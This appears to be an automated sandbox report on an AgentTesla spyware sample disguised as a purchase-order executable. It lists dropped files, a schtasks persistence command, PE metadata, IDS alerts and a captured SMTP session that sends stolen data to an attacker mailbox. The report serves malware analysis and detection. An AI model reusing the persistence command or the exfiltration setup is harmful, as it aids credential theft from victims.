                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.tiro.comtnNEW ORDER.exe, 00000000.00000003.439307136.00000000055BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comdNEW ORDER.exe, 00000000.00000003.449593906.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.449121587.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comasvaNEW ORDER.exe, 00000000.00000002.509460420.00000000055A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.carterandcone.comlNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cn/NEW ORDER.exe, 00000000.00000003.442354972.00000000055A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cnNEW ORDER.exe, 00000000.00000003.442035271.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.442016798.00000000055DD000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.442354972.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.442490931.00000000055AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/cabarga.htmlNEW ORDER.exe, 00000000.00000003.449795160.00000000055D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.commNEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sajatypeworks.coma-dNEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438211868.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438422766.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438358460.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438304023.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438259990.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438397273.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438640795.00000000055C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.commANEW ORDER.exe, 00000000.00000002.509460420.00000000055A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.comoNEW ORDER.exe, 00000000.00000003.449121587.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comFfNEW ORDER.exe, 00000000.00000003.449593906.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.449121587.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comalsNEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.tiro.comcNEW ORDER.exe, 00000000.00000003.439377058.00000000055BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cnu-eNEW ORDER.exe, 00000000.00000003.442016798.00000000055DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              166.62.10.145
                                              		mail.focuzauto.comUnited States
                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:626340
                                              Start date and time: 13/05/202221:31:282022-05-13 21:31:28 +02:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 29s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:NEW ORDER.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:16
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@6/3@1/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Adjust boot time
                                              • Enable AMSI

                                              Warnings

                                              • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 52.242.101.226
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              21:32:56API Interceptor583x Sleep call for process: NEW ORDER.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASNs

                                              No context

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\NEW ORDER.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.355304211458859
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                              MD5:69206D3AF7D6EFD08F4B4726998856D3
                                              SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                              SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                              SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                              C:\Users\user\AppData\Local\Temp\tmp354B.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\NEW ORDER.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1649
                                              Entropy (8bit):5.175352009521638
                                              Encrypted:false
                                              SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBBtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3h
                                              MD5:27C0A47A8667AD260CA88339DC36059E
                                              SHA1:4539B9163F21FEE7DA3590850413B7B328F71358
                                              SHA-256:B031F195C17D439382C9FBA518948E3DAF59044D179D306ECF68A7A3FCA0F321
                                              SHA-512:82F6368DDA23B99CF5C0297B6248B1B51BFC78E9C1BBD70EEE0A959E4B92A04520F008545F422E045BEC0CB203F1AB9F1145E5D8A9FE8E50580384D80201065F
                                              Malicious:true
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t

                                              C:\Users\user\AppData\Roaming\IrUpgWwdRBJK.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\NEW ORDER.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):804864
                                              Entropy (8bit):7.841092667906191
                                              Encrypted:false
                                              SSDEEP:24576:Uk6jSIPaetDssX/qOWCSPr926SWzZJb9K:OjvPPbPixE6SwZN9
                                              MD5:2AB185544E86862DAB6A5E7A4413C49F
                                              SHA1:695EFE1081E5B65894132E870F882B587AD4DFCE
                                              SHA-256:AE376C158F4F8A123CA19B3FE6C96A158C8F7F88257CF07DE7987B33D376ACB2
                                              SHA-512:AD21A66E7CDE53A9F8E3DCB2951C1DF32ED7875F182FAE66F8E4123FE5A60A7B78CAD3B1CFCBE9F68D012EA22773691E882C5D57753A0D4F9AD373ACA61F44B7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 41%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._l~b..............P..>...........\... ...`....@.. ....................................@.................................4\..O....`............................................................................... ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B................h\......H........Y...Z......`.....................................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r+..p~....o-...(......t$....+..*Vs....(/...t.........*..(0...*.0..........

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.841092667906191
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:NEW ORDER.exe
                                              File size:804864
                                              MD5:2ab185544e86862dab6a5e7a4413c49f
                                              SHA1:695efe1081e5b65894132e870f882b587ad4dfce
                                              SHA256:ae376c158f4f8a123ca19b3fe6c96a158c8f7f88257cf07de7987b33d376acb2
                                              SHA512:ad21a66e7cde53a9f8e3dcb2951c1df32ed7875f182fae66f8e4123fe5a60a7b78cad3b1cfcbe9f68d012ea22773691e882c5d57753a0d4f9ad373aca61f44b7
                                              SSDEEP:24576:Uk6jSIPaetDssX/qOWCSPr926SWzZJb9K:OjvPPbPixE6SwZN9
                                              TLSH:550502153B6D7D12E6ABCB352255C1448AB0ECAF7C33E12B7E933C9F284DB5192A0971
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._l~b..............P..>...........\... ...`....@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4c5c86
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x627E6C5F [Fri May 13 14:34:07 2022 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              or al, byte ptr [eax+00h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [esi], cl
                                              inc eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              adc byte ptr [eax+00h], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+eax*2], cl
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              adc dword ptr [eax+00h], eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc5c340x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x5a4.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xc3cb40xc3e00False0.897781888162data7.8467316034IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0xc60000x5a40x600False0.419270833333data4.07653212502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xc80000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0xc60900x314data
                                              RT_MANIFEST0xc63b40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright 2017
                                              Assembly Version1.0.0.0
                                              InternalName73tNI.exe
                                              FileVersion1.0.0.0
                                              CompanyName
                                              LegalTrademarks
                                              Comments
                                              ProductNameCoffee Shop
                                              ProductVersion1.0.0.0
                                              FileDescriptionCoffee Shop
                                              OriginalFilename73tNI.exe

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              192.168.2.5166.62.10.145497835872030171 05/13/22-21:33:25.240893TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49783587192.168.2.5166.62.10.145
                                              192.168.2.5166.62.10.145497835872840032 05/13/22-21:33:25.240991TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249783587192.168.2.5166.62.10.145
                                              192.168.2.5166.62.10.145497835872839723 05/13/22-21:33:25.240893TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49783587192.168.2.5166.62.10.145

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 13, 2022 21:33:23.123352051 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:23.375611067 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:23.375829935 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:23.641664028 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:23.645809889 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:23.898304939 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:23.899597883 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:24.152364969 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:24.153141975 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:24.419075966 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:24.420389891 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:24.672796011 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:24.674534082 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:24.967492104 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:24.985084057 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:24.985897064 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:25.238105059 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:25.238184929 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:25.240892887 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:25.240991116 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:25.242198944 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:25.242266893 CEST49783587192.168.2.5166.62.10.145
                                              May 13, 2022 21:33:25.493294001 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:25.494291067 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:25.510797977 CEST58749783166.62.10.145192.168.2.5
                                              May 13, 2022 21:33:25.659816980 CEST49783587192.168.2.5166.62.10.145

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 13, 2022 21:33:23.062099934 CEST6246653192.168.2.58.8.8.8
                                              May 13, 2022 21:33:23.092401028 CEST53624668.8.8.8192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              May 13, 2022 21:33:23.062099934 CEST192.168.2.58.8.8.80x9a58Standard query (0)mail.focuzauto.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              May 13, 2022 21:33:23.092401028 CEST8.8.8.8192.168.2.50x9a58No error (0)mail.focuzauto.com166.62.10.145A (IP address)IN (0x0001)

                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              May 13, 2022 21:33:23.641664028 CEST58749783166.62.10.145192.168.2.5220-sg2plcpnl0119.prod.sin2.secureserver.net ESMTP Exim 4.94.2 #2 Fri, 13 May 2022 12:33:23 -0700
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              May 13, 2022 21:33:23.645809889 CEST49783587192.168.2.5166.62.10.145EHLO 701188
                                              May 13, 2022 21:33:23.898304939 CEST58749783166.62.10.145192.168.2.5250-sg2plcpnl0119.prod.sin2.secureserver.net Hello 701188 [84.17.52.36]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPE_CONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-CHUNKING
                                              250-STARTTLS
                                              250-SMTPUTF8
                                              250 HELP
                                              May 13, 2022 21:33:23.899597883 CEST49783587192.168.2.5166.62.10.145AUTH login d2hmb3JkQGZvY3V6YXV0by5jb20=
                                              May 13, 2022 21:33:24.152364969 CEST58749783166.62.10.145192.168.2.5334 UGFzc3dvcmQ6
                                              May 13, 2022 21:33:24.419075966 CEST58749783166.62.10.145192.168.2.5235 Authentication succeeded
                                              May 13, 2022 21:33:24.420389891 CEST49783587192.168.2.5166.62.10.145MAIL FROM:<whford@focuzauto.com>
                                              May 13, 2022 21:33:24.672796011 CEST58749783166.62.10.145192.168.2.5250 OK
                                              May 13, 2022 21:33:24.674534082 CEST49783587192.168.2.5166.62.10.145RCPT TO:<obtxxxtf@gmail.com>
                                              May 13, 2022 21:33:24.985084057 CEST58749783166.62.10.145192.168.2.5250 Accepted
                                              May 13, 2022 21:33:24.985897064 CEST49783587192.168.2.5166.62.10.145DATA
                                              May 13, 2022 21:33:25.238184929 CEST58749783166.62.10.145192.168.2.5354 Enter message, ending with "." on a line by itself
                                              May 13, 2022 21:33:25.242266893 CEST49783587192.168.2.5166.62.10.145.
                                              May 13, 2022 21:33:25.510797977 CEST58749783166.62.10.145192.168.2.5250 OK id=1npb2T-007rzz-BE

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:21:32:42
                                              Start date:13/05/2022
                                              Path:C:\Users\user\Desktop\NEW ORDER.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\NEW ORDER.exe"
                                              Imagebase:0x300000
                                              File size:804864 bytes
                                              MD5 hash:2AB185544E86862DAB6A5E7A4413C49F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.505972636.000000000362F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.505972636.000000000362F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Target ID:1
                                              Start time:21:33:04
                                              Start date:13/05/2022
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IrUpgWwdRBJK" /XML "C:\Users\user\AppData\Local\Temp\tmp354B.tmp
                                              Imagebase:0xff0000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:2
                                              Start time:21:33:05
                                              Start date:13/05/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff77f440000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:3
                                              Start time:21:33:06
                                              Start date:13/05/2022
                                              Path:C:\Users\user\Desktop\NEW ORDER.exe
                                              Wow64 process (32bit):true
                                              Commandline:{path}
                                              Imagebase:0x6f0000
                                              File size:804864 bytes
                                              MD5 hash:2AB185544E86862DAB6A5E7A4413C49F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.486980862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
